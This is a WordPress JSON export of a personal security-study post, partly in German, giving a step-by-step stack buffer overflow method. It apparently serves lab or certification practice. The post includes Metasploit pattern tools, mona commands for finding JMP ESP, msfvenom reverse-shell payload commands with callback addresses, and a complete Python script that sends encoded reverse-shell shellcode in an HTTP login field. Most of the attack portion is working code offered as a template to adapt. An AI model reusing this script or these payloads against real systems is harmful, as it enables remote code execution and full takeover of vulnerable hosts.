{"id":356,"date":"2019-09-05T20:04:18","date_gmt":"2019-09-05T18:04:18","guid":{"rendered":"https:\/\/privat.andreas-klingler.de\/itsec\/?p=356"},"modified":"2023-12-20T19:27:18","modified_gmt":"2023-12-20T18:27:18","slug":"buffer-overflow","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=356","title":{"rendered":"Buffer Overflow"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Use the bof1_web.py or bof1_socket.py to&nbsp;start.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Use bof1_socket_10.py to deter\u00admine the posi\u00adtion of the&nbsp;<span class=\"caps\">EIP<\/span>.<\/li><li>Use bof2_socket_20.py with the found <span class=\"caps\">EIP<\/span> off\u00adset to ver\u00adi\u00adfy that the <span class=\"caps\">EIP<\/span> was over\u00adwrit\u00adten with&nbsp;B\u2019s.<\/li><li>Use bof3_socket_10.py with the found <span class=\"caps\">EIP<\/span> and find all bad&nbsp;chars.<\/li><li>Find with Mona a <span class=\"caps\">JMP<\/span> address.<\/li><li>Cre\u00adate pay\u00adload, add it and \u20acprof\u00adit.<\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">0. Confirm vulnerability<\/h2>\n\n\n\n<ol class=\"wp-block-list\"><li>Down\u00adload and exe\u00adcute the tar\u00adget pro\u00adgram and attach a debug\u00adger to&nbsp;it.<\/li><li>Use a script like <a href=\"https:\/\/naturtrunken.de\/p151_git\/scripts\/fuzzing\/web_fuzzer.py\">web_fuzzer.py<\/a> to crash it with an access violation.<\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">1. Determine the position of the&nbsp;<span class=\"caps\">EIP<\/span><\/h2>\n\n\n\n<ol class=\"wp-block-list\"><li>Start the appli\u00adca\u00adtion in a debug\u00adging session.<\/li><li>Cre\u00adate an input string <pre>\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 4096<\/pre><\/li><li>Insert this input string into the appli\u00adca\u00adtion (use <a href=\"https:\/\/naturtrunken.de\/p151_git\/scripts\/buffer_overflow\/bof1.py\">bof1.py<\/a>).<\/li><li>The appli\u00adca\u00adtion should stop now. Note the address to which the <span class=\"caps\">EIP<\/span> points now.&nbsp;<ol><li>Note: When using edb in Lin\u00adux, at the crash time, not the <span class=\"caps\">EIP<\/span> but the error mes\u00adsage shows the actu\u00adal val\u00adue to which the <span class=\"caps\">EIP<\/span> points now!<br><a href=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2020\/07\/Bildschirmfoto-2020-07-09-um-15.16.18.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-thumbnail wp-image-1689\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2020\/07\/Bildschirmfoto-2020-07-09-um-15.16.18-150x150.png\" alt width=\"150\" height=\"150\"><\/a> <\/li><li>If the pro\u00adgram does\u00adn\u2019t crash \u2014 maybe there is a guard which checks the length of the pay\u00adload before and does\u00adn\u2019t exe\u00adcute the prob\u00adlem\u00adat\u00adic func\u00adtion? Try to change the pay\u00adload&nbsp;size.<\/li><\/ol><\/li><li>Cal\u00adcu\u00adlate the posi\u00adtion of the <span class=\"caps\">EIP<\/span> val\u00adue. E.g. if the <span class=\"caps\">EIP<\/span> is <strong>0x39794338 <\/strong>now, cal\u00adcu\u00adlate the posi\u00adtion with <pre>\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -l 4096 -q <strong>39794338<\/strong> [*] Exact match at offset <strong>2306<\/strong><\/pre> <\/li><li>Gen\u00ader\u00adate now a new pay\u00adload with the goal to set the <span class=\"caps\">EIP<\/span> to a defined val\u00adue. Use the fol\u00adlow\u00ading script and set the prop\u00ader val\u00adue for A. <pre>python -c 'print (\"A\" * <strong>2306<\/strong>) + (\"B\" * 4) + (\"C\" * 16) + (\"D\" * 1500)' A: filler B: EIP C: Offset D: buffer for shellcode<\/pre> <\/li><li>Insert the new payload.<\/li><li>The pro\u00adgram should stop so that the <span class=\"caps\">EIP<\/span> now points at <code>0x42424242<\/code>.<\/li><\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Extra: Directly call another function within the program from&nbsp;there.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Assume, there is func\u00adtion in the pro\u00adgram you saw while dis\u00adas\u00adsem\u00adbling. You want to exe\u00adcute this func\u00adtion (e.g. to release some infor\u00adma\u00adtion to cir\u00adcum\u00advent authentication\/authorisation).<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>We want to call the func\u00adtion granted:<br><img loading=\"lazy\" decoding=\"async\" width=\"450\" height=\"87\" class=\"wp-image-3311\" style=\"width: 450px;\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2019\/09\/ss06.png\" alt srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/ss06.png 1054w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/ss06-300x58.png 300w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/ss06-1024x198.png 1024w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/ss06-768x149.png 768w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\"><\/li><li>Use this pay\u00adload to exe\u00adcute the func\u00adtion direct\u00adly:<br><pre>python -c 'print (\"A\" * <strong>2306<\/strong>) + (\"\\xc0\\x85\\x04\\x08\")' <\/pre><\/li><li>Note that the func\u00adtion will be exe\u00adcut\u00aded, but the process will prob\u00ada\u00adbly crash because we did\u00adn\u2019t per\u00adformed the func\u00adtion pro\u00adlog cor\u00adrect\u00adly and by return\u00ading to the caller, the stack is messed up. To pre\u00advent this, add the exit adress direct\u00adly after the added adress so that the process will after the new func\u00adtion direct\u00adly go to the exit of the pro\u00adgram with\u00adout crash\u00ading (hope\u00adful\u00adly). You can find out the exit address e.g. by using objdump\/readelf or via gdb with the <code>p exit<\/code> com\u00admand. Example:<br><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"128\" class=\"wp-image-3312\" style=\"width: 800px;\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-07-23-um-12.19.19.png\" alt srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-07-23-um-12.19.19.png 2552w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-07-23-um-12.19.19-300x48.png 300w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-07-23-um-12.19.19-1024x164.png 1024w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-07-23-um-12.19.19-768x123.png 768w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-07-23-um-12.19.19-1536x246.png 1536w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-07-23-um-12.19.19-2048x327.png 2048w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\"><\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">2. Determine bad characters<\/h2>\n\n\n\n<ol class=\"wp-block-list\"><li>Uncom\u00adment the bad char\u00adac\u00adters block in the script and remove the old input buffer block.<\/li><li>Analyse the mem\u00ado\u00adry and note which char\u00adac\u00adters are break\u00ading the mem\u00ado\u00adry. Note them all down until the whole remain\u00ading bad char\u00adac\u00adter block was writ\u00adten into the memory.<ol><li>E.g. assum\u00ading the following<br><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1652\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2020\/07\/Bildschirmfoto-2020-07-02-um-16.21.58-300x179.png\" alt width=\"300\" height=\"179\" srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/07\/Bildschirmfoto-2020-07-02-um-16.21.58-300x179.png 300w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/07\/Bildschirmfoto-2020-07-02-um-16.21.58.png 396w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\"><\/li><li>Here, 51 is a bad char\u00adac\u00adter. Now, repeat by exe\u00adcut\u00ading the script above again, but remove the \\x51.<\/li><li>And repeat\u2026 until all char\u00adac\u00adters until \\xff are&nbsp;there.<\/li><li><strong>Atten\u00adtion<\/strong>: If the buffer is too small, maybe there is no space for all char\u00adac\u00adters and the input will stop at some point with\u00adout the pres\u00adence of a bad character!<\/li><\/ol><\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">3. Find a return address<\/h2>\n\n\n\n<ol class=\"wp-block-list\"><li>Find a return address to which we want to point the <span class=\"caps\">EIP<\/span>. This should be a sta\u00adt\u00adic address in the mem\u00ado\u00adry. In Immu\u00adni\u00adty, type <pre>!mona modules -o<\/pre> to list only mod\u00adules which are not from the os. Omitt the \u2011o flag to see all references.<\/li><li>Find an entry which has not enabled any pro\u00adtec\u00adtive tech\u00adnique and which address does\u00adn\u2019t start with 00 or any bad character.<br><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"37\" class=\"alignnone wp-image-1655 size-large\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2020-07-03-um-09.02.46-1024x37.png\" alt srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2020-07-03-um-09.02.46-1024x37.png 1024w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2020-07-03-um-09.02.46-300x11.png 300w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2020-07-03-um-09.02.46-768x28.png 768w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2020-07-03-um-09.02.46-1536x55.png 1536w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2020-07-03-um-09.02.46-2048x74.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\"><\/li><li>Search now in the choosen library\/executeable for a posi\u00adtion of a jump state\u00adment to&nbsp;<span class=\"caps\">ESP<\/span>.&nbsp;<ol><li>For x86, the state\u00adment <span class=\"caps\">JMP<\/span> <span class=\"caps\">ESP<\/span> =&nbsp;<span class=\"caps\">FFE4<\/span><\/li><li>In Immu\u00adni\u00adty, find these opcodes via <pre>!mona find -s \"\\xff\\xe4\" -m \"<em>ChoosenExecuteableOrLibraryName.dll.exe<\/em>\"<\/pre>  <\/li><\/ol><\/li><li>Choose one pre\u00advi\u00adous found address of a <span class=\"caps\">JMP<\/span> <span class=\"caps\">ESP<\/span> state\u00adment. Assume, <strong>0x1120110d<\/strong> was&nbsp;found.<\/li><\/ol>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">NOTE<\/span>: If mona finds mul\u00adti\u00adple address\u00ades and some with \u201cascii\u201d, use these address\u00ades&nbsp;first!<img loading=\"lazy\" decoding=\"async\" width=\"500\" height=\"102\" class=\"wp-image-2843\" style=\"width: 500px;\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-02-25-um-21.36.20.png\" alt srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-02-25-um-21.36.20.png 718w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-02-25-um-21.36.20-300x61.png 300w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">4. Create payload<\/h2>\n\n\n\n<ol class=\"wp-block-list\"><li>Cre\u00adate a pay\u00adload and add the bad char\u00adac\u00adters <pre>msfvenom -p windows\/shell_reverse_tcp LHOST=192.168.119.158 LPORT=443 -f python \u2013e x86\/shikata_ga_nai -b \"\\x00\\x0a\\x0d\\x51\"<\/pre> <\/li><li><a href=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2020\/07\/exploitbuffer.txt\">Adapt the fol\u00adlow\u00ading script and replace the pay\u00adload and the <span class=\"caps\">EIP<\/span>.<\/a> Note to reverse the <span class=\"caps\">EIP<\/span> byte order <strong><span class=\"caps\">AND<\/span> to add the <span class=\"caps\">NOP<\/span> slide!<\/strong> <\/li><\/ol>\n\n\n\n<pre class=\"wp-block-preformatted\">#!\/usr\/bin\/python<br><br>import socket<br>import time<br>import sys<br><br>try:<br>    print \"<em>\\n<\/em>Sending evil buffer\"<br>    buf =  b\"\"<br>    buf += b\"<em>\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90<\/em>\"<br>    buf += b\"<em>\\x29\\xc9\\x83\\xe9\\xaf\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81<\/em>\"<br>    buf += b\"<em>\\x76\\x0e\\xa9\\xc8\\xc9\\xe8\\x83\\xee\\xfc\\xe2\\xf4\\x55\\x20<\/em>\"<br>    buf += b\"<em>\\x4b\\xe8\\xa9\\xc8\\xa9\\x61\\x4c\\xf9\\x09\\x8c\\x22\\x98\\xf9<\/em>\"<br>    buf += b\"<em>\\x63\\xfb\\xc4\\x42\\xba\\xbd\\x43\\xbb\\xc0\\xa6\\x7f\\x83\\xce<\/em>\"<br>    buf += b\"<em>\\x98\\x37\\x65\\xd4\\xc8\\xb4\\xcb\\xc4\\x89\\x09\\x06\\xe5\\xa8<\/em>\"<br>    buf += b\"<em>\\x0f\\x2b\\x1a\\xfb\\x9f\\x42\\xba\\xb9\\x43\\x83\\xd4\\x22\\x84<\/em>\"<br>    buf += b\"<em>\\xd8\\x90\\x4a\\x80\\xc8\\x39\\xf8\\x43\\x90\\xc8\\xa8\\x1b\\x42<\/em>\"<br>    buf += b\"<em>\\xa1\\xb1\\x2b\\xf3\\xa1\\x22\\xfc\\x42\\xe9\\x7f\\xf9\\x36\\x44<\/em>\"<br>    buf += b\"<em>\\x68\\x07\\xc4\\xe9\\x6e\\xf0\\x29\\x9d\\x5f\\xcb\\xb4\\x10\\x92<\/em>\"<br>    buf += b\"<em>\\xb5\\xed\\x9d\\x4d\\x90\\x42\\xb0\\x8d\\xc9\\x1a\\x8e\\x22\\xc4<\/em>\"<br>    buf += b\"<em>\\x82\\x63\\xf1\\xd4\\xc8\\x3b\\x22\\xcc\\x42\\xe9\\x79\\x41\\x8d<\/em>\"<br>    buf += b\"<em>\\xcc\\x8d\\x93\\x92\\x89\\xf0\\x92\\x98\\x17\\x49\\x97\\x96\\xb2<\/em>\"<br>    buf += b\"<em>\\x22\\xda\\x22\\x65\\xf4\\xa0\\xfa\\xda\\xa9\\xc8\\xa1\\x9f\\xda<\/em>\"<br>    buf += b\"<em>\\xfa\\x96\\xbc\\xc1\\x84\\xbe\\xce\\xae\\x37\\x1c\\x50\\x39\\xc9<\/em>\"<br>    buf += b\"<em>\\xc9\\xe8\\x80\\x0c\\x9d\\xb8\\xc1\\xe1\\x49\\x83\\xa9\\x37\\x1c<\/em>\"<br>    buf += b\"<em>\\xb8\\xf9\\x98\\x99\\xa8\\xf9\\x88\\x99\\x80\\x43\\xc7\\x16\\x08<\/em>\"<br>    buf += b\"<em>\\x56\\x1d\\x5e\\x82\\xac\\xa0\\xc3\\xe6\\xaf\\x17\\xa1\\xea\\xa9<\/em>\"<br>    buf += b\"<em>\\xc9\\x72\\x61\\x4f\\xa2\\xd9\\xbe\\xfe\\xa0\\x50\\x4d\\xdd\\xa9<\/em>\"<br>    buf += b\"<em>\\x36\\x3d\\x2c\\x08\\xbd\\xe4\\x56\\x86\\xc1\\x9d\\x45\\xa0\\x39<\/em>\"<br>    buf += b\"<em>\\x5d\\x0b\\x9e\\x36\\x3d\\xc1\\xab\\xa4\\x8c\\xa9\\x41\\x2a\\xbf<\/em>\"<br>    buf += b\"<em>\\xfe\\x9f\\xf8\\x1e\\xc3\\xda\\x90\\xbe\\x4b\\x35\\xaf\\x2f\\xed<\/em>\"<br>    buf += b\"<em>\\xec\\xf5\\xe9\\xa8\\x45\\x8d\\xcc\\xb9\\x0e\\xc9\\xac\\xfd\\x98<\/em>\"<br>    buf += b\"<em>\\x9f\\xbe\\xff\\x8e\\x9f\\xa6\\xff\\x9e\\x9a\\xbe\\xc1\\xb1\\x05<\/em>\"<br>    buf += b\"<em>\\xd7\\x2f\\x37\\x1c\\x61\\x49\\x86\\x9f\\xae\\x56\\xf8\\xa1\\xe0<\/em>\"<br>    buf += b\"<em>\\x2e\\xd5\\xa9\\x17\\x7c\\x73\\x39\\x5d\\x0b\\x9e\\xa1\\x4e\\x3c<\/em>\"<br>    buf += b\"<em>\\x75\\x54\\x17\\x7c\\xf4\\xcf\\x94\\xa3\\x48\\x32\\x08\\xdc\\xcd<\/em>\"<br>    buf += b\"<em>\\x72\\xaf\\xba\\xba\\xa6\\x82\\xa9\\x9b\\x36\\x3d<\/em>\"<br><br>    eip = \"<em>\\x83\\x0c\\x09\\x10<\/em>\"<br>    inputBuffer = (\"A\" * <em>760<\/em>) + eip + (\"C\" * <em>16<\/em>) + buf<br>    content = \"username=\" + inputBuffer + \"&amp;password=A\"<br><br>    buffer = \"POST \/login HTTP\/1.1<em>\\r\\n<\/em>\"<br>    buffer += \"Host: 10.10.63.37<em>\\r\\n<\/em>\"<br>    buffer += \"User-Agent: Mozilla\/5.0 (X11; Linux_86_64; rv:52.0) Gecko\/20100101 Fire<em>\\r\\n<\/em>\"<br>    buffer += \"Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8<em>\\r\\n<\/em>\"<br>    buffer += \"Connection: close<em>\\r\\n<\/em>\"<br>    buffer += \"Content-Type: application\/x-www-form-urlencoded<em>\\r\\n<\/em>\"<br>    buffer += \"Content-Length: \"+str(len(content))+\"<em>\\r\\n<\/em>\"<br>    buffer += \"<em>\\r\\n<\/em>\"<br>    buffer += content<br><br>    s = socket.socket (socket.<em>AF_INET<\/em>, socket.<em>SOCK_STREAM<\/em>)<br>    s.connect((\"10.10.63.37\", <em>8899<\/em>))<br>    s.send(buffer)<br>    s.close()<br><br>except:<br>    print \"<em>\\n<\/em>Could not connect!\"<br>    sys.exit()<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">5. Execute<\/h2>\n\n\n\n<ol class=\"wp-block-list\"><li>Open a nc listener.<\/li><li>Prof\u00adit.<\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Notes<\/h2>\n\n\n\n<ul class=\"wp-block-list\"><li>If there is an access violation:&nbsp;<ul><li>Make sure that the NOPs are&nbsp;there.<\/li><li>Make sure that the com\u00admands are aligned (one <span class=\"caps\">NOP<\/span> more?) See the next image. In this case, one <span class=\"caps\">NOP<\/span> is too&nbsp;much.<br><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"161\" class=\"wp-image-2597\" style=\"width: 400px;\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-02-01-um-13.20.44.png\" alt srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-02-01-um-13.20.44.png 1416w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-02-01-um-13.20.44-300x121.png 300w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-02-01-um-13.20.44-1024x412.png 1024w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-02-01-um-13.20.44-768x309.png 768w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\"><\/li><li>Dou\u00adble check that the shell\u00adcode is com\u00adplete and does\u00adn\u2019t stop before. In the next exam\u00adple, it stops after <span class=\"caps\">C1<\/span> and is short\u00ader as it should be. Cause: A bad char\u00adac\u00adter was added with <code>-b \"\\x00\\x0a\\x0d\\x25<\/code>\\x26\\<strong>0<\/strong>x3d\u201d and not with <code>-b \"\\x00\\x0a\\x0d\\x25\\x26\\x3d\"<\/code>.<br><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"253\" class=\"wp-image-2601\" style=\"width: 400px;\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-02-01-um-14.01.10.png\" alt srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-02-01-um-14.01.10.png 562w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2019\/09\/Bildschirmfoto-2021-02-01-um-14.01.10-300x190.png 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\"><\/li><li>Make sure that the gen\u00ader\u00adat\u00aded shell\u00adcode looks right; espe\u00adcial\u00adly that he returns at the end. See the fol\u00adlow\u00ading screen\u00adshot as exam\u00adple.<br><a href=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2020\/07\/bo_korrekt.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1687 size-medium\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2020\/07\/bo_korrekt-243x300.png\" alt width=\"243\" height=\"300\" srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/07\/bo_korrekt-243x300.png 243w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/07\/bo_korrekt-828x1024.png 828w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/07\/bo_korrekt-768x950.png 768w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/07\/bo_korrekt-1242x1536.png 1242w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/07\/bo_korrekt-1656x2048.png 1656w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/07\/bo_korrekt.png 1876w\" sizes=\"auto, (max-width: 243px) 100vw, 243px\"><\/a> <\/li><\/ul><\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Older notes<\/h2>\n\n\n\n<ul class=\"wp-block-list\"><li>The script \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb cre\u00adates long strings which can be used to detect spe\u00adcif\u00adic posi\u00adtions in input strings.&nbsp;<ul>\n<li>Or, if this should not work: https:\/\/zerosum0x0.blogspot.com\/2016\/11\/overflow-exploit-pattern-generator.html<\/li>\n<\/ul>\n<\/li><li>Then, detect which part over\u00adwrote the&nbsp;<span class=\"caps\">EIP<\/span>&nbsp;<ul>\n<li>Wan\u00addele den <span class=\"caps\">EIP<\/span> in <span class=\"caps\">ASCII<\/span>&nbsp;um<\/li>\n<li>Drehe es&nbsp;um<\/li>\n<li>Finde die Stelle, an der es im Pay\u00adload vorkommt<\/li>\n<li>Bringe dort den gew\u00fcn\u00adscht\u00aden Wert ein \u2014 ans Umdrehen denken!<\/li>\n<\/ul>\n<\/li><li>Vor\u00adsicht vor bes\u00adtimmten Werten im Payload:&nbsp;<ul>\n<li>0x00 Null-Byte (offen\u00adsichtlich)<\/li>\n<li>0x0D Zeilenum\u00adbruch (markiert i.d.R. Ende ein\u00ader Eingabe)<\/li>\n<li>Testen auf schlechte Werte: Sende ein\u00admal einen Pay\u00adload mit allen Eingaben von 0x00 bis 0xff und schaue, wie die Anwen\u00addung darauf reagiert.&nbsp;<ul>\n<li>Z.B. mit fol\u00adgen\u00addem Skript:<\/li>\n<li>\n<pre>ruby -e '0.upto(255).each { |i| print \"\\\\x#{(i &lt; 16) ? \"0\" : \"\"}#{i.to_s(16)}\" }'<\/pre>\n<\/li>\n<li>Dann damit aus\u00adf\u00fchren. Beim Anhal\u00adten schauen, welch\u00ader Wert an der Adresse des Stack-Zeigers (<span class=\"caps\">ESP<\/span>)&nbsp;liegt.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li><li>Pay\u00adloads k\u00f6n\u00adnen gener\u00adiert werten durch<\/li><\/ul>\n\n\n\n<div class=\"page\" title=\"Page 168\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>msfvenom -l payloads<\/pre>\n<ul>\n<li>Beispiel daf\u00fcr f\u00fcr Win\u00addows-Reverse-Shell ohne einige b\u00f6se Zeichen: (Es muss nat\u00fcr\u00adlich vor Aus\u00adf\u00fchrung nc auf dem Host lauschen, zu dem die Reverse-Shell weit\u00adergeleit\u00adet wer\u00adden&nbsp;soll.)<\/li>\n<\/ul>\n<div class=\"page\" title=\"Page 169\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>msfvenom -p windows\/shell_reverse_tcp LHOST=10.0.0.4 LPORT=443 -f c \u2013e x86\/shikata_ga_nai -b \"\\x00\\x0a\\x0d\"<\/pre>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Use the bof1_web.py or bof1_socket.py to&nbsp;start. Use bof1_socket_10.py to deter\u00admine the posi\u00adtion of the&nbsp;<span class=\"caps\">EIP<\/span>. Use bof2_socket_20.py with the found <span class=\"caps\">EIP<\/span> off\u00adset to ver\u00adi\u00adfy that the <span class=\"caps\">EIP<\/span> was over\u00adwrit\u00adten with&nbsp;B\u2019s. Use bof3_socket_10.py with the found <span class=\"caps\">EIP<\/span> and find all bad&nbsp;chars. Find with Mona a <span class=\"caps\">JMP<\/span> address. Cre\u00adate pay\u00adload, add it and \u20acprof\u00adit. 0. Con\u00adfirm vul\u00adner\u00ada\u00adbil\u00adi\u00adty Download&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[471,468],"tags":[101,102],"class_list":["post-356","post","type-post","status-publish","format-standard","hentry","category-privesc","category-general","tag-buffer-overflow","tag-exploitation"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=356"}],"version-history":[{"count":41,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/356\/revisions"}],"predecessor-version":[{"id":3395,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/356\/revisions\/3395"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}